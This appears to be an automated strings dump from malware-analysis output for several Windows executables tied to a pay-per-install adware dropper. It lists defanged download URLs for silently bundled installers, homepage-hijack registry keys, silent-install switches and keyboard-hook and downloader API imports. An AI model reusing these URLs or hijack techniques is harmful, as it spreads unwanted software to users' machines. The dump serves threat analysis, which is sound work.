hXXp://down3.xzskycn.com/down/2345Explorer_233301_silence.exe
hXXp://down1.xzskycn.com/down/2345Explorer_233301_silence.exe
hXXp://down2.xzskycn.com/down/2345Explorer_233301_silence.exe
soft\2345Explorer_233301_silence.exe
hXXp://down3.xzskycn.com/down/youdaodict.exe
hXXp://down1.xzskycn.com/down/youdaodict.exe
hXXp://down2.xzskycn.com/down/youdaodict.exe
soft\youdaodict.exe
hXXp://down3.xzskycn.com/down/FunshionInstall_C148130.exe
hXXp://down1.xzskycn.com/down/FunshionInstall_C148130.exe
hXXp://down2.xzskycn.com/down/FunshionInstall_C148130.exe
soft\FunshionInstall_C148130.exe
hXXp://down3.xzskycn.com/down/music_kwun3963.exe
hXXp://down1.xzskycn.com/down/music_kwun3963.exe
hXXp://down2.xzskycn.com/down/music_kwun3963.exe
soft\music_kwun3963.exe
hXXp://down3.xzskycn.com/down/PPTV(pplive)_jinshan_533.exe
hXXp://down1.xzskycn.com/down/PPTV(pplive)_jinshan_533.exe
hXXp://down2.xzskycn.com/down/PPTV(pplive)_jinshan_533.exe
soft\PPTV(pplive)_jinshan_533.exe
2012.lnk
Uh.KN
pwc.dll
hXXp://adsvc2.9365.info/ad/softad/pwc.htm
Program Files\Internet Explorer\iexplore.exe
hXXp://hao.uenet.info
hao.uenet.info
webpopup@
webcountD
WebBrowser1P
WebBrowser2
|*.dma;*.tpe;*.way;*.mfd;*.mdf
Provider=Microsoft.Jet.OLEDB.4.0;Data Source=
;Persist Security Info=False;Jet OLEDB:Database Password=NewartIflash
gttdgp.bat
!!""##$$%%&&''(())**  ,,--..//0123456789:;<=>?
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegFlushKey
RegCreateKeyExA
WinExec
GetWindowsDirectoryA
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
SetViewportExtEx
UnhookWindowsHookEx
SetWindowsHookExA
SetKeyboardState
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
shell32.dll
ShellExecuteA
URLMON.DLL
URLDownloadToFileA
comdlg32.dll
1 1$1(1,1014181
7 7$7(7,7074787
7"7,747@7
8 8$878]8
> >$>(>,>0>4>
6 6=6`6|6
1 1$1(161>1
3 3$3(3,303
11C1R1a1m1~1
;);-;8;\;
6 6$6(6,6064686<6
? ?$?(?,?0?4?8?<?@?
5%5S5
 0@0]0~0
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
rSqlTimSt
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
Lines.Strings
Items.Strings
WebBrowser1
Skin3rd.Strings
W0.cu'
!WY%u(
Provider=Microsoft.Jet.OLEDB.4.0;Data Source=%Documents and Settings%\Administrator\
\one love.mdb;Persist Security Info=False;Jet OLEDB:Database Password=NewartIflash
LoginPrompt
Microsoft.Jet.OLEDB.4.0
MSDASQL.1
MSDASQL
hXXp://adsvc2.9365.info/ad/softad/popup.htm
hXXp://adsvc2.9365.info/count/softcount/?pwc
Invalid format type for BCD$Could not parse SQL TimeStamp string
Invalid SQL date/time values
Invalid Enum Value&Missing Connection or ConnectionString0Filter property cannot be used for detail tablesUDataset does not support bookmarks, which are required for multi-record data controls
Missing %s property(CommandText does not return a result set{Error creating object. Please verify that the Microsoft Data Access Components 2.1 (or later) have been properly installed=Events are not supported with server side TableDirect cursors'Unsupported field type (%s) in field %s;A connection component is required for async ExecuteOptions5Cannot perform a requery after connection has changed
FilterOptions are not supported
0Cannot perform this operation on an open dataset"Dataset not in edit or insert mode1Cannot perform this operation on a closed dataset#Nested dataset must inherit from %s
Parameter '%s' not found
Unable to load bind parameters$Field '%s' is of an unsupported type
SQL not supported: %s
Execute not supported: %s1Operation not allowed on a unidirectional dataset
%s is not a valid BCD value
0'%s' is not a valid integer value for field '%s'0'%s' is not a valid boolean value for field '%s'7'%s' is not a valid floating point value for field '%s'6Type mismatch for field '%s', expecting: %s actual: %s6Size mismatch for field '%s', expecting: %d actual: %d Invalid variant type or size for field '%s'#Value of field '%s' is out of range
Field '%s' must have a value
Field '%s' has no dataset1Field '%s' cannot be a calculated or lookup field
Field '%s' cannot be modified
No index for fields '%s'
Index '%s' not found"Circular datalinks are not allowed/Lookup information for field '%s' is incomplete
Invalid ownerE%d is an invalid PageIndex value. PageIndex must be between 0 and %d=This control requires version 4.70 or greater of COMCTL32.DLL
Invalid FieldKind Field '%s' is of an unknown type
Duplicate field name '%s'
Field '%s' not found#Cannot access field '%s' as type %s
Invalid value for field '%s'E%g is not a valid value for field '%s'. The allowed range is %g to %gE%s is not a valid value for field '%s'. The allowed range is %s to %s
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s
Failed to clear tab control Failed to delete tab at index %d"Failed to retrieve tab at index %d Failed to get object at index %d"Failed to set tab "%s" at index %d Failed to set object at index %d
Clipboard does not support Icons
Text exceeds memo capacity/Menu '%s' is already being used by another form
Error setting %s.Count8Listbox (%s) style must be virtual in order to set Count"Unable to find a Table Of Contents
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Value must be between %d and %d
Invalid input value7Invalid input value. Use escape key to abandon changes
%s property out of range
Invalid operation on TOleGraphic
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list Too many rows or columns deleted$%s not in a class registration group
Property %s does not exist
Invalid stream format$''%s'' is not a valid component name
Invalid property element: %s
Invalid property type: %s
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file %s1Fixed column count must be less than column count Fixed row count must be less than row count
Cannot open file %s
Grid too large for operation
Unable to write to %s
Ancestor for '%s' not found
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
Variant is not an array!Variant array index out of bounds-Custom variant type (%.4x) already used by %s(Custom variant type (%.4x) is not usable-Too many custom variants have been registered
External exception %x
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp
I/O error %d

axuls.exe_1160:




.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
u%CNu
Uh.AA
.Owner
iwusuoa.bat
hXXp://VVV.baidu.com/baidu?tn=flstudios_cb&word={searchTerms}&cl=3&ie=utf-8
Program Files\Internet Explorer\iexplore.exe"
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
IFoxInstall-y-c203945859-run-s-x.exe
hXXp://219.239.223.191/hzsoft/IFoxInstall-y-c203945859-run-s-x.exe
hXXp://download.grandcloud.cn/9291/15956/IFoxInstall-y-c203945859-run-s-x.exe
hXXp://117.21.183.24/ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe
hzsoft\IFoxInstall-y-c203945859-run-s-x.exe
LD_2075_S.exe
hXXp://xz.657080.com/download.php/LD_2075_S.exe
hzsoft\LD_2075_S.exe
setup_2948-140896.exe
hXXp://click.t3nlink.com/link/140896/setup_2948-140896.exe
hzsoft\setup_2948-140896.exe
play_3020_161196.exe
hXXp://VVV.huamei-global.com/play_3020_161196.exe
hzsoft\play_3020_161196.exe
xkcc_50091167828.exe
hXXp://down.chinashangrui.com/xkgb/xkcc_50091167828.exe
hzsoft\xkcc_50091167828.exe
2suys_31_1008_01.exe
hXXp://down.haoie.net/2suys_31_1008_01.exe
hzsoft\2suys_31_1008_01.exe
sjss_jing_zhimeng_217.exe
hXXp://download.grandcloud.cn/9291/25605/sjss_jing_zhimeng_217.exe
hzsoft\sjss_jing_zhimeng_217.exe
tqrl_89_177560.exe
hXXp://down.tianyunxj.com/tqrl_89_177560.exe
hzsoft\tqrl_89_177560.exe
htop_x.exe
hXXp://lct.mnxc8.net:3234/-9003_176254_mvx.exe
hzsoft\htop_x.exe
apples_5_1008.exe
hXXp://down.9vh.net/apples_5_1008.exe
hzsoft\apples_5_1008.exe
setup_t10304.exe
hXXp://down.xiaoxinrili.com/hezi/jm/setup_t10304.exe
hzsoft\setup_t10304.exe
dudu_b_80068.exe
hXXp://down.shuyeer.net/dudu/dudu_b_80068.exe
hzsoft\dudu_b_80068.exe
meitulm_01.exe
hXXp://guangqu.oss-cn-hangzhou.aliyuncs.com/qd/meitulm_01.exe
hzsoft\meitulm_01.exe
sysdiag-c61.exe
hXXp://down4.huorong.cn/sysdiag-c61.exe
hzsoft\sysdiag-c61.exe
unersqa.exe
unotcvb.exe
setup_open_188.exe
setupX_054.exe
setup_2949-14598.exe
Program Files\2345Explorer\Uninstall.exe
hXXp://VVV.9365.info
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegFlushKey
RegCreateKeyExA
WinExec
GetWindowsDirectoryA
GetCPInfo
URLMON.DLL
URLDownloadToFileA
6 6$6(6,6064686<6
7"7&7*7.72767
?'? ?/?3?7?;?
0"0&0*0.02060
KWindows
UrlMon
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Ancestor for '%s' not found
Cannot assign a %s to a %s
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file %s
Cannot open file %s$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

axult.exe_460:




.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
u%CNu
Uh.UA
.Owner
nshdyiy.bat
hXXp://VVV.baidu.com/baidu?tn=flstudios_cb&word={searchTerms}&cl=3&ie=utf-8
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SHELL FOLDERS
Program Files\Internet Explorer\iexplore.exe"
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
setup_2949-14598.exe
hXXp://download.grandcloud.cn/9291/15474/setup_2949-14598.exe
hzsoft\setup_2949-14598.exe
setup_qd304.exe
hXXp://down.guangsu.cn/qdn/setup_qd304.exe
hzsoft\setup_qd304.exe
UUSEE_kb1003_Setup_133149.exe
hXXp://download.uusee.com/pop1/kb1003/UUSEE_kb1003_Setup_133149.exe
hzsoft\UUSEE_kb1003_Setup_133149.exe
a-zm-157391-v5.exe
hXXp://client-b.jtdichan.com/packages/g_wz/default2/a-zm-157391-v5.exe
hzsoft\a-zm-157391-v5.exe
glad_mny.exe
hXXp://lct.mny8.net:3234/-8836_158017_mvy.exe
hzsoft\glad_mny.exe
cyiesetup.exe
hXXp://download.grandcloud.cn/9291/25533/cyiesetup.exe
hzsoft\cyiesetup.exe
fhsli&zmqd_2007_173253.exe
hXXp://software.m013.com/slience/fhsli&zmqd_2007_173253.exe
hzsoft\fhsli&zmqd_2007_173253.exe
zb_anchor.exe
hXXp://jump.mnzhubo.net:3234/-9003_178109_mvzb.exe
hzsoft\zb_anchor.exe
c79af4009041.exe
hXXp://down.shuyeer.net/jt/c79af4009041.exe
hzsoft\c79af4009041.exe
jgimeside_yllm_127.exe
hXXp://down.waisong8.com/input/jgimeside_yllm_127.exe
hzsoft\jgimeside_yllm_127.exe
yxku_s[300].exe
hXXp://down.xingfubobo.com/yxku/bind/yxku_s[300].exe
hzsoft\yxku_s[300].exe
setup_s1018.exe
hXXp://xz.dianxinshu.com/download/setup_s1018.exe
hzsoft\setup_s1018.exe
bdBaofeng5[[1716_00001376]].exe
hXXp://u.dl.baofeng.com/upload/bdBaofeng5[[1716_00001376]].exe
hzsoft\bdBaofeng5[[1716_00001376]].exe
forqd953_1375.exe
hXXp://dl.wodemeitu.com/pptv/forqd953_1375.exe
hzsoft\forqd953_1375.exe
mx_4qh.exe
hXXp://mk.maxthon.cn/max4/liwei/mx_4qh.exe
hzsoft\mx_4qh.exe
unersqa.exe
unotcvb.exe
IFoxInstall-y-c203945859-run-s-x.exe
setup_open_188.exe
setupX_054.exe
hXXp://VVV.9365.info
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegFlushKey
RegCreateKeyExA
WinExec
GetWindowsDirectoryA
GetCPInfo
URLMON.DLL
URLDownloadToFileA
?!?%?)?-?1?^?
KWindows
UrlMon
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Ancestor for '%s' not found
Cannot assign a %s to a %s
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file %s
Cannot open file %s$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

IFoxInstall-y-c203945859-run-s-x.exe_1360:




.text
`.rdata
@.data
.rsrc
@.reloc
8%uEP3
tGHt.Ht&
kernel32.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
127.0.0.1
RegDeleteKeyExW
e:\work\code\sohu\trunk-new\bin\release-static\IFoxOnlineInstall.pdb
VERSION.dll
KERNEL32.dll
GetKeyState
SetWindowsHookExW
UnhookWindowsHookEx
USER32.dll
SetViewportOrgEx
GDI32.dll
RegOpenKeyW
RegCloseKey
RegOpenKeyExW
RegDeleteKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegCreateKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
HttpOpenRequestW
HttpAddRequestHeadersW
HttpSendRequestW
HttpQueryInfoW
InternetOpenUrlW
WININET.dll
WS2_32.dll
IPHLPAPI.DLL
GdiplusShutdown
gdiplus.dll
IMM32.dll
COMCTL32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
.?AVCSHKeySignalArgs@shui@@
zcÁ
09/13/10
"iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Macintosh" xmpMM:InstanceID="xmp.iid:547C02C673D911E0983BE89B6357981F" xmpMM:DocumentID="xmp.did:547C02C773D911E0983BE89B6357981F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:04FD7EE773D711E0983BE89B6357981F" stRef:documentID="xmp.did:04FD7EE873D711E0983BE89B6357981F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Macintosh" xmpMM:InstanceID="xmp.iid:547C02CA73D911E0983BE89B6357981F" xmpMM:DocumentID="xmp.did:547C02CB73D911E0983BE89B6357981F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:547C02C873D911E0983BE89B6357981F" stRef:documentID="xmp.did:547C02C973D911E0983BE89B6357981F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>>@
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Macintosh" xmpMM:InstanceID="xmp.iid:04FD7EE573D711E0983BE89B6357981F" xmpMM:DocumentID="xmp.did:04FD7EE673D711E0983BE89B6357981F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:04FD7EE373D711E0983BE89B6357981F" stRef:documentID="xmp.did:04FD7EE473D711E0983BE89B6357981F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
,^T)UF%UF9AL9J@
M.FL6AJ
=<40:24648
1DW%X
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="XP style manifest" processorArchitecture="x86" version="1.0.0.0" type="win32"></assemblyIdentity><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo></assembly>PA<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
2=3Q3
747;78
1.24282<2@2
< <(<0<8<
4 4$4(4,4
? ?$?(?,?0?4?8?<?
KERNEL32.DLL
mscoree.dll
windows
hXXp://tv.sohu.com/upload/hdfeedback/index.jsp?p2p
hXXp://p2p.hd.sohu.com/dcs.do?n=offline&f=1
\SHOnlineInstall.ini
hXXp://photocdn.hd.sohu.com/upgrade/IFoxInfo_%s.cfg
hXXp://photocdn.hd.sohu.com/upgrade/IFoxInfo.cfg
cfgUrl
\IFoxInfo.ini
\SoHuVA_Install.exe
%Program Files%\
/SP- /VERYSILENT /SUPPRESSMSGBOXES /NOICONS /NORESTART "%s"
xxxxxxxxxxxxxxxx
HTTP/1.1
1C49D6C1-DF17-4c22-8F76-0223272B35DA
hXXp://p2p.hd.sohu.com.cn/dcs.do?type=download&error=%d&v=%s&ChannelID=%d&last_error=%d&local=%d&referID=%s
&dif_time=%d&download_speed=%.2f
hXXp://p2p.hd.sohu.com.cn/dcs.do?type=install
&error=%d&v=%s&ChannelID=%d&last_error=%d&referID=%s
&reinstall=%d
%d.%d.%d.%d
\SHVersion.dll
\sohu.cfg
&uid=%d
&LocalIp=%s
&MashCode=%s
&ChannelID=%d
&v=%s
×tamp=%d
&btea=%s
@HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
AAdvapi32.dll
WTL_CmdBar_InternalAutoPopupMsg
WTL_CmdBar_InternalGetBarMsg
uxtheme.dll
comctl32.dll
@d:d
%Program Files%\fjwyusp\IFoxInstall-y-c203945859-run-s-x.exe
%Program Files%\fjwyusp
IFoxInstall-y-c203945859-run-s-x.exe
windows 98/2000/2003/xp/vista/win7
<a href="tv.sohu.com">
SHOnlineInstall.exe

sjss_jing_zhimeng_217.exe_1724:




.text
`.rdata
@.data
.rsrc
@.reloc
SSSSh
xxxxxx
operator
GetProcessWindowStation
GetProcessHeap
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
GdiplusShutdown
gdiplus.dll
COMCTL32.dll
SHLWAPI.dll
InternetOpenUrlW
WININET.dll
PSAPI.DLL
IPHLPAPI.DLL
GetCPInfo
zcÁ
%Program Files%\fjwyusp\hzsoft\sjss_jing_zhimeng_217.exe
%DX$#
.lycXWq
Pf.St
\qp%d
.rR(f!
.ARch
_%S5'
yy|%F
rQL?O.qB
@%C=W\V
%8XJ9
I&.Cm
%s^[c
M.SjV
|(%CW
^AÍi
PxQC)%sqZ
~.aoN
bT.Sq
7*.El
eZ3~:8%u
-f}>q{BA
.CXe}r
jl.ME
P.ag^
1.DILRU
p:\)!
$!$''')))6
.$(()////0
%.U]Pj
<requestedExecutionLevel level="highestAvailable" uiAccess="false"></requestedExecutionLevel>
9 9$9(9,90949{;
;0,1014181<1@1
:,>0>4>8>
\Config.ini
\sjss.exe
%s\install_%d.tmp
?sn=%s&tmac=%s&action=kb&ver=%s
%s\%s
Software\Microsoft\Windows\CurrentVersion\Uninstall\
%s\%s.lnk
%s\Microsoft\Internet Explorer\Quick Launch\%s.lnk
%s\%s.exe
nKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
%Program Files%\sjss
1.0.0.4
: %dM)
uninstall.exe
sjss.inc
Install.exe

sjss.exe_216:




.text
`.rdata
@.data
.rsrc
@.reloc
SSSSh
RSShx
WhD%F
zh0%F
SSSh0EF
SSShHEF
N@SSShDKF
xSSSh
FTPjKS
FtPj;S
C.PjRV
monochrome
unsupported bit depth
portuguese-brazilian
operator
GetProcessWindowStation
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
User-Agent: Mozilla/4.0
xxxxxx
\sjss\Release\sjss.pdb
KERNEL32.dll
USER32.dll
GDI32.dll
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
gdiplus.dll
SHLWAPI.dll
InternetOpenUrlW
WININET.dll
WS2_32.dll
IPHLPAPI.DLL
GetCPInfo
GetKeyState
OLEAUT32.dll
COMCTL32.dll
#*1892 $
%,3:;4-&
.?AVCWebBrowserUI@DuiLib@@
.?AVCActiveXEnum@DuiLib@@
zcÁ
$.KTg
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
2'3.353<3`3~3
5]5V5f5v5
4>4]4,6?6
;)=0=6>=>
:';,;<;};
;1<]<~<^>
? ?$?(?,?0?4?8?<?@?
8 8$8(8,8
<,<8<@<`<
=$=,=4=<=
User32.dll
msimg32.dll
keyboard
password
msftedit.dll
WebBrowser
dest='%d,%d,%d,%d'
WebBrowserUI
webkcolorb
webkcolora
{c #FF0000}%d{/c}
CalendGroupName_%d
CalendMoothGroupName_%d
M-d-d
source='%d,%d,%d,%d' dest='%d,%d,%d,%d'
dest='%d,%d,%d,%d' source='%d,%d,%d,%d'
nKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
id_%s
@SoftWare\Microsoft\Windows\CurrentVersion\Uninstall\
.com/?
11228-2419
%s\%s
?sn=%s&tmac=%s&action=rstart&ver=0.4
\Config.ini
\desksvr.ini
sjss.exe
%ProgramFiles%\Internet Explorer\iexplore.exe
\Internet Explorer.lnk
Google Chrome.lnk
Google Chrome
Mozilla Firefox.lnk
%s\Microsoft\Internet Explorer\Quick Launch\%s.lnk
%s\%s.lnk
Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
{871C5380-42A0-1069-A2EA-08002B30309D}
SouSuo.zip
SouSuo.xml
hXXp://VVV.so.com/
hXXp://VVV.baidu.com/
hXXp://VVV.sogou.com/
hXXp://VVV.google.com/
hXXp://VVV.so.com/s?q=
hXXp://VVV.baidu.com/#wd=
hXXp://VVV.sogou.com/web?query=
hXXp://VVV.google.com.hk/search?q=
1.png
2.png
3.png
0.png
GSouSuo.zip
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss\sjss.exe
%Documents and Settings%\%current user%\Local Settings\Application Data\sjss

AppleDesktop.exe_1952:




.text
`.rdata
@.data
.rsrc
@.reloc
w%s( 
8%u(j
<.tS<>
111111111111
11111111
1111111111
j.Yf;
_tcPVj@
.PjRW
9%D,3
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
GetProcessWindowStation
operator
Urls
startup_urls
urls_to_restore_on_startup
customized_url
()$^.* ?[]|\-{},:=!
LOCAL_CFG_SECRET_KEY-{63B9182A-75D7-446E-AF33-68575300B270}
CLOUD_CFG_SECRET_KEY-{A94E09A8-AC7E-489B-BF11-D461D2A68DA1}
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
catalogInfos
Util\ShellExecuteByExplorer
Keyword
RegOpenKeyTransactedW
%windir%\system32\compmgmt.msc
CmdFirst
CmdLast
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
.%D,3
%d_byte ptr
0xX
 0xX
-0xX
[0xI64X] ANOMALY: REX prefix before legacy prefix 0xX
[0xI64X] ANOMALY: Duplicate prefix 0xX
[0xI64X] ERROR: Reached maximum prefix count %d
[0xI64X] ANOMALY: Reached maximum prefix count %d
[0xI64X] ERROR: Invalid opcode 0xX
[0xI64X] ERROR: Invalid two byte opcode 0xX 0xX
[0xI64X] ERROR: Opcode 0xX 0xX ("%s") illegal in 64-bit mode
[0xI64X] ERROR: Opcode 0xX 0xX ("%s") illegal with 16-bit operand size
[0xI64X] ERROR: Illegal SSE instruction opcode 0xX 0xX   prefix 0xX
[0xI64X] ERROR: Illegal SSE instruction opcode 0xX 0xX   prefix 0xX   extension %d
[0xI64X] ERROR: Invalid group opcode 0xX 0xX extension 0xX
[0xI64X] ERROR: Opcode 0xX ("%s") illegal in 64-bit mode
[0xI64X] ERROR: Opcode 0xX ("%s") illegal with 16-bit operand size
[0xI64X] ERROR: Invalid group opcode 0xX extension 0xX
[0xI64X] ERROR: Illegal opcode 0xX 0xX   modrm 0xX
[0xI64X] ERROR: Invalid FPU opcode 0xX   modrm extension 0xX (index 0xX)
[0xI64X] ANOMALY: operand size prefix used with 3DNOW instruction
[0xI64X] ERROR: Illegal opcode 0xX 0xX   suffix 0xX
[0xI64X] ERROR: Instruction "%s" (opcode 0xX) can't be used in 16-bit X86
[0xI64X] ERROR: Instruction "%s" (opcode 0xX) can only be used in X86-64
[0xI64X] ANOMALY: operand size prefix used with FPU/MMX/SSEx
[0xI64X] ANOMALY: use of operand size prefix meaningless when REX.w=1
[0xI64X] ANOMALY: use of REX.w is meaningless (default operand size is 64)
[0xI64X] ANOMALY: unexpected segment 0xX
[0xI64X] ERROR: Illegal use of lock prefix for instruction "%s"
[0xI64X] ERROR: maximum instruction length reached ("%s")
[0xI64X] ANOMALY: ENTER has invalid operand 2
[0xI64X] ANOMALY: ENTER has invalid operand 3
